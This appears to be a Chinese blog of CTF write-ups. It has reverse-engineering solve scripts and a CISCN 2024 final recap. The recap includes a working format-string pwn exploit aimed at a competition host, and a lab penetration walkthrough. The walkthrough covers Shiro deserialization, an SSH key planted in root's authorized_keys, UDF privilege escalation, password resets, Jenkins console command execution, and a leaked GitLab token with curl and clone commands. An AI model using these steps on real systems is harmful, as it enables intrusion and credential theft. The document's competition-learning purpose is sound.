ans = [105,244,63,10,24,169,248,107,129,138,25,182,96,176,14,89,56,229,206,19,23,21,22,198,179,167,152,66,28,201,213,80,162,151,102,36,91,37,50,17,170,41,3,84,85,226,131,38,71,32,18,142,70,39,112,220,16,219,159,222,11,119,99,203,47,148,185,55,93,48,153,113,1,237,35,75,67,155,161,74,108,76,181,233,186,44,125,232,88,8,95,163,200,249,120,243,174,212,252,234,58,101,228,86,109,144,104,121,117,87,15,132,12,20,165,115,136,135,118,69,68,2,82,123,250,251,53,255,51,221,211,195,145,140,254,0,116,43,29,217,197,183,168,188,34,218,146,147,98,149,246,180,103,33,40,207,208,192,143,26,154,225,100,141,175,124,230,62,177,205,110,202,253,173,46,52,114,164,166,137,158,122,13,83,178,133,189,187,7,184,77,245,216,190,194,72,157,172,171,199,160,45,49,27,204,81,6,92,59,209,239,130,97,61,214,215,73,90,126,42,30,240,79,224,78,223,111,60,4,5,196,231,106,64,139,235,150,227,238,191,127,31,156,54,241,242,134,247,128,65,94,57,210,236,9,193]

for i in range(l):
    t = ans.index(result[i])
    print(chr(t ^ 0xff ^ i), end='')
# flag{U_90t_th3_p1c5t0re_fl49!}

主要是要注意下不能用BitVec,可能是因为有负数的运算吧。

RTTT

发现一个异或,出来结果是 Welc0me to RCTF 2O22
然后硬件断点一路跟下去,发现生成RC4的S盒。
然后拿到KeyStream(我的keystream是加密了'f'的结果)
然后对着结果硬件断点,发现一个strcmp。
不过我发现解出来后顺序不对,应该是有个树的遍历(看着比较像)
于是我弄了一个唯一确定的字符序列,用来获取SBox。

keystream = bytes.fromhex("""
11 93 47 0F 85 91 E1 FE  0C 8E 4D F8 6F 8A 87 CC
A4 7C 70 1B 09 96 30 26  5D 30 39 5E 43 BD 0F 81
09 74 B0 F4 4E 0B 90 63  48 11
""")
ans = bytes.fromhex("""
34 C2 65 2D DA C6 B1 AD  47 BA 06 A9 3B C1 CC D7
F1 29 24 39 2A C0 15 02  7E 10 66 7B 5E EA 5E D0
59 46 E1 D6 6E 5E B2 46  6B 31""")

k = [ans[i] ^ keystream[i] ^ ord('f') for i in range(len(keystream))]
t = "".join(map(chr, k))
print(k)
# generate SBOx
a = "yJzLkHwDxaCAtnsPipmIBfhljdGbeOqKNcEMugvFor"
b = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOP"
sbox = [a.index(b[i]) for i in range(len(a))]
for i in range(len(t)):
    print(t[sbox[i]], end='') # RCTF{03C3E9B2-E37F-2FD6-CD7E-57C91D77DD61}

CheckYourKey

RegisterNatives -> True Function -> AES -> B58Encode(table1) -> B64Encode(table2) -> Strcmp
2024-09-17T05:58:20.png

web_run

JEB 反编译,找到main函数
2024-09-17T09:14:05.png

SEED = (202211110054 - 1) & 0xffffffff
def _f7():
    global SEED
    v0 = SEED * 6364136223846793005 + 1
    SEED = v0
    return (v0 >> 33) % 16


def _f8(par):
    if par >= 0 and par <= 9:
        return 48 + par
    val = par - 10 
    if val == 0:
        return 97
    elif val == 1:
        return 98
    elif val == 2:
        return 99
    elif val == 3:
        return 100
    elif val == 4:
        return 101
    elif val == 5:
        return 102
    return 48


def generate(s):
    for i in range(len(s)):
        if not (s[i] != 52 and s[i] != 45):
            continue
        if s[i] == 120:
            v2 = _f8(_f7())
            s[i] = v2
        else:
            v2 = _f8((_f7() & 3) | 0x8)
            s[i] = v2 
    return bytes(s)


A = generate(list(b'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'))
print(f"RCTF{{{A.decode()}}}")
# RCTF{40959ea7-26e0-4c9d-8f4a-62faf14ff392}

Destination

挂上TitanHide,注意到NtSetInformationThread, NtGetContextThread这两个反调试
x64dbg断下后在线程开始ret即可。
NtSetInformationThread会使当前线程从调试器隐藏,调试器跑飞
NtGetContextThread可以获取到当前线程的寄存器状况,用来检测DR寄存器来反硬件断点
还有一个反调试是我进入后发现的,主线程卡住,但是线程窗口里面有一个线程一直在Sleep(1);,于是干掉就行了。

于是我们就得到了第一个patch的附件,我们以这个附件为基础继续调。
注意到我们输入完flag之后给我们来了个int3,导致进入SEH流程,如下图所示。
2024-08-20T18:01:48.png
图中框起来的是SEH处理函数,我们进去后,显然是似了。
2024-08-20T18:02:35.png
我们观察到,这些花指令由2种构成
1.call $+5; add [esp], 5; retn
2.jnz addr; jz addr
显然第一种可以化简为nop,第二种我们可以化简为jmp addr
处理脚本如下

from pwn import u32, u8
binfile = open("Destination_patched_2.exe","rb").read()
 
founds = []
# find all junkcode
index = 0
while True:
    index = binfile.find(b'\xE8\x00\x00\x00\x00\x83\x04\x24\x05\xC3',index+1) #! index+1 ! 不然死循环了...
    if index == -1:
        break
    founds.append(index)
    print(index)
binfile = bytearray(binfile)
for i in founds:
    print(binfile[i:i+10])
    for j in range(i,i+10):
        binfile[j] = 0x90
    print(binfile[i:i+10])
# find all junkcode
index = 0
while True:
    i = binfile.find(b'\x0f\x84',index+1)
    index = i
    if i == -1:
        break
    if binfile[index+6:index+8] == b'\x0f\x85' and u32(binfile[index+2:index+6]) - u32(binfile[index+8:index+12]) == 6:
        binfile[i] = 0x90
        binfile[i+1] = 0xe9
        binfile[i+7] = 0x66
        binfile[i+8] = 0x0f
        binfile[i+9] = 0x18
        binfile[i+10] = 0x20
        binfile[i+11] = 0x90

index = 0
while True:
    i = binfile.find(b'\x74',index+1)
    index = i
    if i == -1:
        break
    if binfile[i+2] == 0x75 and binfile[i+1] - binfile[i+3] == 2:
        binfile[i] = 0xeb
        binfile[i+2] = 0x90
        binfile[i+3] = 0x90
        binfile[i+4] = 0x90

# replace all matches
print(open("Destination_p3.exe","wb").write(binfile))

处理完花指令后,我们进入Ghidra,直接当成Func,然后手动处理一点东西,就得到了:
2024-08-20T18:05:47.png


void xxtea(void)

{
  uint e;
  uint sum;
  uint z;
  uint i;
  int round;
  uint y;
  
  round = 50;
  sum = 0;
  z = src[0xb];
  do {
    sum += 0xa4b46062;
    e = sum >> 2 & 3;
    src[0xb] = z;
    for (i = 0; i < 11; i += 1) {
      y = src[i + 1];
      z = src[i] + ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (key[i & 3 ^ e] ^ z));
      src[i] = z;
    }
    z = src[0xb] +
        ((z >> 5 ^ src[0] << 2) + (src[0] >> 3 ^ z << 4) ^ (sum ^ src[0]) + (key[i & 3 ^ e] ^ z));
    src[0xb] = z;
    round += -1;
  } while (round != 0);
  return;
}

显然的xxtea。
分析完这个后,我们下硬件断点,发现没断下来而且值还被改了,我们回到主函数,找到这个地址
2024-08-20T18:09:13.png
有一个jmp far
2024-08-20T18:09:26.png
ida的反汇编这里有点问题,我们x32dbg看一看,发现是jmp far 0x33:xxxxx
2024-08-20T18:10:09.png
这是windows下的天堂之门,0x23就是转32位,0x33就是转64位运行,这个是CS寄存器的值。
我们把jmp far的目标地址函数dump下来,放到一个二进制文件,拖入ida,选中64 bit mode,就可以看到真正的源码了。
2024-08-20T18:11:37.png
可以注意到,这是一个已经玩烂的不安全CRC,它曾出现在:北邮去年招新赛的五子棋程序逆向、D^3CTF,moectf2024中。
提供两种解法,第一种就是z3-Solver

from z3 import *
from copy import deepcopy
s = Solver()
x = [BitVec(f"x{i}", 32) for i in range(12)]
y = deepcopy(x)
ans = [0xA790FAD6, 0xE8C8A277, 0xCF0384FA, 0x2E6C7FD7, 0x6D33968B, 0x5B57C227, 0x653CA65E, 0x85C6F1FC, 0xE1F32577, 0xD4D7AE76, 0x3FAF6DC4, 0x0D599D8C]
print(len(ans))
for i in range(12):
    for j in range(32):
        x[i] = If(LShR(x[i], 31) == 1, 2*x[i] ^ 0x84A6972F, 2*x[i])
    s.add(x[i] == ans[i])
print(s.check())
print(s.model())
'''
12
sat
[x1 = 1585230664,
 x10 = 950802794,
 x0 = 2656343363,
 x3 = 2246810078,
 x7 = 688747158,
 x11 = 422273590,
 x9 = 2522199337,
 x4 = 3061995652,
 x5 = 3304541857,
 x6 = 582058634,
 x8 = 428794995,
 x2 = 3651684911]
'''

也是最方便的,下面的解法是按照原理来的:
由于由于左移会变偶数,而xor后又会变成奇数,所以有唯一解。
我们先获取最低位是否为1,如果是1,说明是奇数,如果为奇数,说明它刚刚走的是最高位是1的那条分支,也说明它异或了立即数,我们直接给它异或回来,然后右移1,由于我们已经确定最高位是1,我们给它补上1即可。
如果最低位是0,我们就直接右移1,然后确定最高位是0即可。

解密脚本

#include <iostream>
#include <Windows.h>
// n = 12
typedef DWORD uint;
void xxtea(uint32_t* src, int n, uint32_t const key[4])
{

    if (n > 0) /* Coding Part */
    {
        uint e;
        uint sum;
        uint z;
        uint i;
        int round;
        uint y;

        round = 50;
        sum = 0;
        z = src[0xb];
        do {
            sum += 0xa4b46062;
            e = sum >> 2 & 3;
            src[n - 1] = z;
            for (i = 0; i < n - 1; i += 1) {
                y = src[i + 1];
                z = src[i] + ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (key[i & 3 ^ e] ^ z));
                src[i] = z;
            }
            z = src[n - 1] +
                ((z >> 5 ^ src[0] << 2) + (src[0] >> 3 ^ z << 4) ^ (sum ^ src[0]) + (key[i & 3 ^ e] ^ z));
            src[n - 1] = z;
            round += -1;
        } while (round != 0);
    }
    else if (n <= 0)
    {
        uint32_t y, z, sum;
        unsigned p, rounds, e;

        n = -n;
        rounds = 50;
        sum = rounds * 0xa4b46062;
        y = src[0];
        do
        {
            e = (sum >> 2) & 3;
            for (p = n - 1; p > 0; p--)
            {
                z = src[p - 1];
                y = src[p] -= ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (key[p & 3 ^ e] ^ z));
            }
            z = src[n - 1];
            y = src[0] -= ((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (key[p & 3 ^ e] ^ z));
            sum -= 0xa4b46062;
        } while (--rounds);

    }
}

unsigned char a[] = {0xd6, 0xfa, 0x90, 0xa7, 0x77, 0xa2, 0xc8, 0xe8, 0xfa, 0x84, 0x03, 0xcf, 0xd7, 0x7f, 0x6c, 0x2e, 0x8b, 0x96, 0x33, 0x6d, 0x27, 0xc2, 0x57, 0x5b, 0x5e, 0xa6, 0x3c, 0x65, 0xfc, 0xf1, 0xc6, 0x85, 0x77, 0x25, 0xf3, 0xe1, 0x76, 0xae, 0xd7, 0xd4, 0xc4, 0x6d, 0xaf, 0x3f, 0x8c, 0x9d, 0x59, 0x0d};
//unsigned char a[] = "flag{111111111111111111111111111111111111111}";
unsigned char k[] = {0x6b, 0x7a, 0x0e, 0x6b, 0xee, 0x11, 0x30, 0xd1, 0x6d, 0x2c, 0xe1, 0xa7, 0xa6, 0xac, 0x99, 0xc1 };
int main()
{
    for (int i = 0; i < 12; i++)
    {
        uint32_t n = *(i + (uint32_t*)a);
        for (int j = 0; j < 32; j++)
        {
            if (n & 1)
            {
                n ^= 0x84A6972F;
                n >>= 1;
                n |= 0x80000000;
            }
            else
            {
                n >>= 1;
                n &= 0x7fffffff;
            }
        }
        *(i + (uint32_t*)a) = n;
    }

    xxtea((uint32_t*)a, -12, (uint32_t*)k);
    xxtea((uint32_t*)a, -12, (uint32_t*)k);
    std::cout << a; //DubheCTF{82e1e3f8-85fe469f-8499dd48-466a9d60}
    return 0;
}

regadgets 版本的xxtea exp

from regadgets import *
k = [0x6b, 0x7a, 0x0e, 0x6b, 0xee, 0x11, 0x30, 0xd1, 0x6d, 0x2c, 0xe1, 0xa7, 0xa6, 0xac, 0x99, 0xc1]
k4 = byte2dword(k)
enc = byte2dword(bytes.fromhex("""
43 95 54 9e 48 b3 7c 5e 2f 4a a8 d9 de 99 eb 85
84 58 82 b6 a1 4e f7 c4 8a 82 b1 22 96 72 0d 29
73 e4 8e 19 29 b5 55 96 6a 19 ac 38 36 62 2b 19
"""))


dec = xxtea_decrypt(enc, k4, delta=0xa4b46062, additional_rounds=40)
dec = xxtea_decrypt(dec, k4, delta=0xa4b46062, additional_rounds=40)

print(dword2bytes(dec))

写在开头

2024/7/19 - 2024/7/21 作为西安电子科技大学的L-Team和7-Team,参加了全国大学生信息安全竞赛总决赛,
其中,L-Team拿下全国12名的成绩,获得全国一等奖(1~22名),7-Team拿下35名,荣获全国二等奖(23~46名)。
2024-07-21T17:11:47.png
本文会从笔者实时解题思路出发,以第一人称的视角记录,希望给后来人一些应对的措施。
队友: luo(队长, pwn 手), chick(pwn 手), passers-by(web 手), 0xcafebabe(re | web 手)

第 4294967291 天 - Build

.git 泄露

第 0 天 - 环境测试

早上赶高铁,下午到达成都,到了后回酒店收拾然后去比赛场地进行环境测试,我们4个人固定了属于自己的网线以固定IP地址,我则开了docker compose容器(codimd)来进行在线同步文档,队友开了viper(红队神器),peiqi等..., 我们把各自被分配到的IP放入了Codimd在线文档中以快速访问。
在这之前,我利用xzSpider先知社区的技术文档全部扒了下来以供比赛时候查看,并且我还准备了许多离线工具和文档,工具例如
1.CyberChef - CTFers的离线瑞士军刀
2.jadx - Java 反编译利器
3.JByteMod - Java 字节码更改神器
4.godzilla - 中文名哥斯拉,用来管理Webshell。
5.Behinder - 中文名冰蝎,用来管理Webshell。
6.Webshell_Generate - 用来生成Webshell木马。
7.WireShark - 流量分析神器
8.dnSpy - .NET 分析利器
9.IDA, IDA-64, IDA8, IDA8-64 逆向神器 (伏笔:ida不支持mipsl架构)
10.Py基础库

httpx
requests
pycryptodome
z3-solver
pyshark
numpy
gmpy2
Pillow
pandas
dirsearch
paramiko
colorlog
fenjing
flask

11.fscan和nmap ip/端口扫描神器
12.dirsearch(py包)目录扫描神器
13.fenjing(py包)SSTI神器
14.VmWare WorkStation 17
15.Kali 虚拟机 with External Internet
16.php_enhanced_zh.chm
17.x32dbg/x64dbg
18.burp suite
19.010Editor
20.de4dot - .NET 反混淆神器
21.GDA - apk分析神器
22.VSCODE && VS studio
23.Alacritty - 我喜欢用的终端
24.obs studio - 比赛要全程录屏
25.bandizip && 7zip
26.Proxifier
27.Everything
28.IntelliJ IDEA Ultimate
29.nodejs && npm 并安装基础包 (当时忘了下载了导致悲剧)
30.Java 8 && 一个高版本,并且会自己换环境变量来切版本。
31.HeidiSQL - 多个sql数据库的管理
32.至少一个Windows系统,用于渗透。
33.C&&C++ 完整工具链
34.Rust工具链
35.C#工具链
36.phpStudy && xdebug + vscode 本机调试php代码,详情见另一篇文章。
.......
总之,工具很多,我们把工具和文档(13GB左右)放在了一个移动硬盘,然后比赛前所有队员都拿着电脑来拷贝一份,保证所有人都有这些tools和文档,来保证进度的同步和完整性。

就这样,第0天就过去了,- 不过在晚上,主办方竟然在群里发了1.3GB的附件加密压缩包的百度网盘链接,说是下载然后第二天备用,顺便在21点左右发了第二天可信计算的VMWARE镜像和操作文档,防止和去年一样被冲于是禁言了群聊,好一个猝不及防,好一个酒店网速。-

第一天 AWDP + CTF(可信计算) (炸裂)

早上我们赶到现场后,由于我用的是无线鼠标和键盘,主办方开了信号干扰,导致全部失效,还好早预料到了,所以带了有线的鼠标(接口在20cm外键盘根本用不了,所以以后线下断网赛就别带无线了,全上有线,最好是军工级别😋,抗干扰)。
由于我们之前从来没有打过AWDP,我开始的时候优先选择了Break(攻击),但是好半天都没成功拿到flag,一转眼,防御3血全被抢完了,我才意识到亏大了,由于AWDP每一轮的分会加上你当前所有分的总和,所以我们相当于少吃上了很多轮的分,而且n血分分数还会递减,导致我们每一轮都比别人少加分,最后导致了严重的结果。所以AWDP比赛防御比攻击重要速度要比准确重要,得到的经验是,先把所有的题目fix掉,然后跟着Attack榜打,由于我们的失误,导致AWDP直接爆炸,而且CTF也没时间做,可信计算0分,AWDP 48名左右,感觉已经与国二无缘了,和队友开玩笑明天渗透赛拿个全场第一说不定还有救,当天晚上,我从0学习了渗透,和7Team一起刷了春秋云境的Privilege赛题(伏笔),顺便把h0ny和X1r0z的blog全拉了下来给渗透用,掌握了Jenkins和Gitlab如何渗透.....然后后面打域的时候照着WP复现也很困难,就没打了,整体打了5个多小时吧。

AWDP-PWN

CHR

Defense

convert选项里在调用iconv后尝试复制4 * size个字节到当前的堆上,存在堆溢出,将memcpy的第三个参数改为size通过。

anime

Defense

存在格式化字符串漏洞。将printf(format)改为printf("%s", format)。由于前面就有一个字符串hello,%s。所以我们只用想办法将原来的第一个参数放到第二个;利用偏移将%s的地址放到第二个参数里。将call printf前的mov eax, 0删除,后面的往前移可以多出来修改的空间。

Attack

输入的数据经过了 AES 加密,密钥可以直接找到。
key: e/Nc1pxHXV5vHXojGHv5NA==

#! /usr/bin/env python3.8
from pwn import *
from ctools import *
from SomeofHouse import *
from Crypto.Cipher import AES

context(os="linux", arch="amd64")
TMUX_TERMINAL()
# context.log_level = "debug"
# context.newline=b'\r\n'

elf_path = './pwn'
libc_path = './libc.so.6'

init_elf_with_libc(elf_path, libc_path, path='./anime', force=True)
DEBUG = lambda script = '': gdb.attach(io, gdbscript=script)

conn_context(host='123.56.92.131', port=39363, level=REMOTE, elf=elf_path)
conn_context(args=[PRE_LOAD], rpath=[libc_path, './libcrypto.so.1.1', './libdl.so.2', './libpthread.so.0'])

elf = ELF(elf_path)
libc = ELF(libc_path, checksec=False)
io = conn()

key = b''
def ss(pad):
    aes = AES.new(key, AES.MODE_ECB)
    io.sendafter(b'what\'s your favourite anime:', aes.encrypt(pad))
    
def exp():
    global key
    key_raw = [123, 243, 92, 214, 156, 71, 93, 94, 111, 29, 122, 35, 24, 123, 249, 52]
    for i in key_raw:
        key += p8(i)
    
    aes = AES.new(key, AES.MODE_ECB)
    io.sendafter(b'name', b'a' * 0x8 + p16(0x150f))

    ss(b'%12$p%15$p%19$p'.ljust(0x10, b'A'))

    io.recvuntil(b'0x')
    stack = int(io.recv(12), 16) - 0x100 + 0x18 -0x50
    success(hex(stack))

    io.recvuntil(b'0x')
    libc.address = int(io.recv(12), 16) - libc.symbols['__libc_start_main'] - 243
    success(hex(libc.address))

    io.recvuntil(b'0x')
    elf.address = int(io.recv(12), 16) - elf.symbols['main']
    success(hex(proc.address))
    
    
    pad = f'%{stack & 0xffff}c%6$hn'.encode()
    ss(pad.ljust(0x10, b'a'))

    main_ptr = (elf.address + 0x1553) & 0xffff
    pad = f'%{main_ptr}c%{0x27 + 6}$hhn'.encode()
    # print(len(pad))
    ss(pad.ljust(0x10, b'a'))

    sleep(1)
    io.send(p64(stack + 0x50) + p64(stack + 0x52))
    
    one = libc.address + 0xe3b01
    pad = f'%{one & 0xffff}c%10$hn'.encode()
    ss(pad.ljust(0x10, b'a'))

    pad = f'%{(one >> 16) & 0xff}c%11$hhn'.encode()
    # DEBUG('b * $rebase(0x15CB)')
    ss(pad.ljust(0x10, b'a'))

    pass


try:
    exp()
    io.interactive()
finally:
    rm_core()
    pass

ezHeap

Defense

输入 json 格式。

{"choice":"new","index":0,"length":1,"message":"1"}

rm里有 UAF,但尝试直接将free(heap_list[i])直接改为heap_list[i] = 0时 check 不过。但在modify时存在堆溢出,将newmodify的大小固定为 1024 通过。

AWDP-Web

ezjs

看了下录制回放,发现自己4个小时都在搞这个,就是没打通,隔壁队友在盯着字节码修Java,但是最后炸了。

Defense

在文件上传的地方把/.ejs/i加入正则匹配,然后对上传内容加了exec和globals过滤。
不过隔壁7队直接把..过滤掉了,就过了.....

Attack (未打通)

赛后和其他战队交流发现是上传名为.ejs的文件就没有后缀了,真的没想到。

ShareCard

Defense

SSTI,把它的safe_render_templete改成官方自己的,就安全了。

Attack (未打通)

...fenjing用不了,还没学SSTI,就没打了。

第二天 渗透 + CTF(工控安全 车联网安全)

还好第二天不是动态积分,要不然真丸辣。

渗透题目简介

在这个靶场中,您将扮演一名渗透测试工程师,接受雇佣任务来评估 VertexSoft 科技有限公司的网络安全。VertexSoft 是一家专注于互联网与信息技术领域的领先公司,该公司致力于为客户提供卓越的数字解决方案,以满足各种业务需求。 您的任务是首先入侵公司在公网上暴露的应用程序,然后运用后渗透技巧深入 VertexSoft 公司的内部网络。在这个过程中,您将寻找潜在的弱点和漏洞,并逐一接管所有服务。最终的目标是接管域控制器,从而控制整个内部网络。靶场中共设置了8个Flag,它们分布在不同的靶机上,您需要找到并获取这些Flag作为您的成就目标。 该靶场已为选手提供了 VPS,其与靶场入口同一网段,仅用于反弹 Shell 和反向代理使用。反弹 Shell 和反向代理时请使用 VPS 内网 IP 作为监听地址。 VPS SSH 凭据:root/*********,请选手登陆后自行修改 SSH 密码。

ERP (Shiro+Spring+heapdump)

给了一个erp主机ip,一个vps主机ip(其实没用,因为erp主机不出网,但是还是建议更改vps的密码),先扫描erp主机的ip,发现开着一个Web服务和SSH端口,随后得知Web服务有Spring的heapdump泄露,我们先下载泄露的heapdump,然后查看/actuator/beans,注意到是Shiro,我们想到了春秋云境的Hospital题目中的Shiro+Spring,我们使用JDumpSpider进行分析,注意到有Key泄露,且是AES-GCM的加密,我们使用Shiro反序列化利用工具SummerSec/ShiroAttack2,勾选GCM后即可拿下Shell,由于ssh是开的,且whoami后发现是root权限,我们将自己的SSH公钥放到/root/.ssh/authorized_keys里面,就可以通过ssh链接远程靶机了,随后cat /flag.txt即可拿下第一个flag。
随后我们在ERP上穿了stowaway agent然后把java服务下掉了,正向连接我们队友的ip的8080服务端口做的代理,设置Proxifier,让我们访问192.168.8.*的时候代理到他的内网,我们就可以进行内网扫描渗透了。

内网横向扫描信息

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
(icmp) Target 192.168.8.146   is alive
(icmp) Target 192.168.8.9     is alive
(icmp) Target 192.168.8.16    is alive
(icmp) Target 192.168.8.12    is alive
(icmp) Target 192.168.
is alive
(icmp) Target 192.168.8.26    is alive
(icmp) Target 192.168.8.42    is alive
(icmp) Target 192.168.8.253   is alive
[*] Icmp alive hosts len is: 8
192.168.8.12:88 open
192.168.8.9:8000 open
192.168.8.38:3306 open
192.168.8.9:1433 open
192.168.8.26:445 open
192.168.8.38:445 open
192.168.8.12:445 open
192.168.8.16:445 open
192.168.8.9:445 open
192.168.8.26:139 open
192.168.8.38:139 open
192.168.8.12:139 open
192.168.8.16:139 open
192.168.8.16:135 open
192.168.8.9:139 open
192.168.8.26:135 open
192.168.8.38:135 open
192.168.8.12:135 open
192.168.8.9:80 open
192.168.8.9:135 open
192.168.8.26:8080 open
192.168.8.42:22 open
192.168.8.146:22 open
192.168.8.16:8080 open
192.168.8.42:80 open
192.168.8.146:8080 open
192.168.8.9:8172 open
192.168.8.42:8060 open
192.168.8.42:9094 open
[*] alive ports len is: 29
start vulscan
[*] NetInfo
[*]192.168.8.9
   [->]WIN-IISSERER
   [->]192.168.8.9
[*] NetBios 192.168.8.26    WORKGROUP\WIN-PC3788
[*] NetBios 192.168.8.12    [+] DC:VERTEXSOFT\RODC
[*] NetBios 192.168.8.16    WORKGROUP\WIN-SERVER03
[*] NetBios 192.168.8.9     WORKGROUP\WIN-IISSERER
[*] NetBios 192.168.8.38    WORKGROUP\WIN-OPS88
[*] WebTitle http://192.168.8.42:8060  code:404 len:555    title:404 Not Found
[*] NetInfo
[*]192.168.8.12
   [->]RODC
   [->]192.168.8.12
[*] NetInfo
[*]192.168.8.38
   [->]WIN-OPS88
   [->]192.168.8.38
[*] WebTitle http://192.168.8.146:8080 code:302 len:0      title:None 跳转url: http://192.168.8.146:8080/login;jsessionid=56BFBD13B1984442735B72749905D5F2
[*] WebTitle http://192.168.8.9        code:200 len:43679  title:VertexSoft
[*] NetInfo
[*]192.168.8.26
   [->]WIN-PC3788
   [->]192.168.8.26
[*] NetInfo
[*]192.168.8.16
   [->]WIN-SERVER03
   [->]192.168.8.16
[*] WebTitle http://192.168.8.146:8080/login;jsessionid=56BFBD13B1984442735B72749905D5F2 code:200 len:1383   title:Master ERP login Form
[*] WebTitle https://192.168.8.9:8172  code:404 len:0      title:None
[*] WebTitle http://192.168.8.42       code:302 len:99     title:None 跳转url: http://192.168.8.42/users/sign_in
[*] WebTitle http://192.168.8.26:8080  code:200 len:147    title:第一个 JSP 程序
[*] WebTitle http://192.168.8.16:8080  code:403 len:594    title:None
[+] PocScan http://192.168.8.146:8080 poc-yaml-spring-actuator-heapdump-file
[*] WebTitle http://192.168.8.9:8000   code:200 len:4018   title:Modbus Monitor - VertexSoft Internal Attendance System
[+] PocScan http://192.168.8.146:8080 poc-yaml-springboot-env-unauth spring2
[*] WebTitle http://192.168.8.42/users/sign_in code:200 len:11166  title:登录 · GitLab

WIN-OPS88 (MySQL 弱密码 + Windows)

2024-07-22T05:56:45.png
MySQL弱密码root@123456,然后进行UDF提权(mdut工具一把梭),拿下Shell后,进行 net user Administrator <password>进行密码修改,然后通过WindowsRDP进行远程桌面登陆,在C:\Users\Administrator\flag\flag.txt中找到第二个flag。

RODC (Misc + Windows)

书接上回,在WIN-OPS88桌面上有一个WPS OFFICE,让我们很疑惑为什么会有,我们点开后查看Recent,发现了一个表格,里面有一组账号密码。
2024-07-22T06:05:09.png
由于文件名带有ROAdmins,很容易我们想到是RODC相关密码,我们发现这些密码均能远程登陆RODC Windows的RDP,然后在C:\Users\Administrator\flag\flag.txt中找到第三个flag。有人可能会疑惑为什么非Administrator用户能够访问Administrator的文件夹,因为鉴权没弄好,我认为这个题目原本是让你先提权再拿Flag,结果没做好,让选手白白赚了600分。

Jinkens 和 GitLab(Jenkins + GitLab + API_TOKEN 泄露 + 弱密码)

我们在做完上面几个题目后,只用了不到3个小时,后面的时间都在找Jenkins的密码,由于刚开始没有体系化进行攻击,导致我们没有很早挖出Jenkins的密码,后来队友跑了个密码字典,发现密码是admin123,但是这时候已经距离比赛结束只有12分钟了。不过前一天在春秋云境做过Privilege题目,正好可以用上它的思路。我们找到Jenkins里面的GitLab API-Token,发现是加密的,我们采用Jenkins的脚本命令行输入println(hudson.util.Secret.decrypt("{xxxxx}"))来解密GitLab的API-Token,另外,对于Jenkins的flag,我们只需要输入println "type C:\\Administrator\\flag\\flag.txt".execute().text即可拿下Jenkins的flag,我们有了GitLab的APIToken(glpat-bGEgHAJDvwaPP78rsLeS)就可以访问它的所有仓库,我们接下来进行详细分析。
我们在linux环境中使用proxychains curl --header "PRIVATE-TOKEN: glpat-bGEgHAJDvwaPP78rsLeS" "http://192.168.8.42/api/v4/projects"可以获得一个巨大的返回json,通过这个json可以观察到GitLab中所有的储存库信息,我们直接拉下第一个git clone http://oauth2:<API_TOKEN>@192.168.8.42/vertexsoft/vertexsoftbackup.git然后里面的backups.txt就是最后GitLab的flag。
注:gitlab其他仓库的内容可能与其他题目有关,但是我们做出这个题只剩3分钟了。

192.168.8.9:8000 (挖掘但未攻克)

2024-07-22T06:22:50.png
这个题目在注册用户的时候,把自己的权限组通过burp suite的中断,可以更改为admin,然后就可以有了admin的权限,我们发现头像上传这里可以上传文件,但是我们最后也无法上传asp后缀之类的文件,浪费了很多时间。
我们发现
2024-07-22T06:24:23.png
这里的Export存在任意文件读写(把后面的文件名可以改成C:\Windows\win.ini)这样的字样,就可以正确下载,但是这并没有什么作用。
最终这个题只获得了这些信息,而且都没用上

用户名
admin
密码
A1m!n@Qsx1Jn
年龄
20
性别
20
手机号
13012345678
邮箱
admin@vertexsoft.com
部门
Operations Department
岗位
Operation and Maintenance Engineer
角色
admin

Portal (未解出)

通过dirsearch发现有子目录/backup,再从子目录开始扫,发现有/backup/upload,然后里面有个index.jsp文件,但是是空白,最后才知道这个可以文件上传使用PUT,哎这完全没提示啊!!!

CTF 相关题目

流量分析

使用wireshark打开发现时modbus流量,筛选modbus功能码16,字节数为4的流量

modbus && modbus.func_code == 16 && modbus.byte_cnt == 4

发现包17478和包18216中写入116和117寄存器,且值相同,为0x408e147b,大端序,转成float为4.44

#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <string.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/sendfile.h>

#include <sys/mman.h>

int main(){
    float a;
    int *b = (int*)&a;
    *b = 0x408e147b;
    printf("%f", a);
    
    return 0;
}

固件分析

将中间的nk_dump解压后

find . -type f | xargs strings | grep 'www\..*\.com' | grep -v 'microsoft' | grep 'www\..*\.com'

使用这一条指令之后寻找可疑域名, 找到了一个相当可疑的:
www.jidfv4f0k0vnzl2cni6eref90gg.com
之后逆向分析附件中包含 backdoor 的程序 ping.exe,使用binwalk发现中间有隐藏文件(直接分析是mips。。。),分离后通过IDA进行分析,获得端口号 48952。
flag{www.jidfv4f0k0vnzl2cni6eref90gg.com:48952}

vxdz (未解出)

这题没有扒拉到poc,网上是有的,后来得知是压缩+TripleDES,这谁能猜到啊,这题也是poc一把梭,但是flag让人忍俊不禁
flag{vxdzvxdz}

灵车 (未解出)

大奋。

第二天晚上 晚宴

抽奖:介质消除工具

思路一:正常中奖

由于没有华为的赞助了,国赛抽奖不行事了,不过我们可以让先到的队员把签到二维码泄露出来,然后我们发给认识的好友,让他们也签到,这样就同时提高了分子和分母,由糖水原理,我们中奖的概率一定增加,不过最后我们也没中,反倒是嘉宾中的一个接着一个。

思路二:未鉴权导致的中奖攻击

由于有的人可能并不在场但是签到了,或者已经离开,而三轮抽奖中总是不够10人,这时候由于并不会验证你是否中奖,你直接硬着头皮往上走我觉得都是可以的,不过最后我们也没有这样做。
经过观察,第一轮抽奖上去9个人,第二轮7人,第三轮9人。显然第二轮更容易遭到攻击,具体POC留给下一届了,我也是圆满退役国赛了,大家其他比赛再见!

  1. 1
  2. 2
  3. 3
  4. 4
  5. 5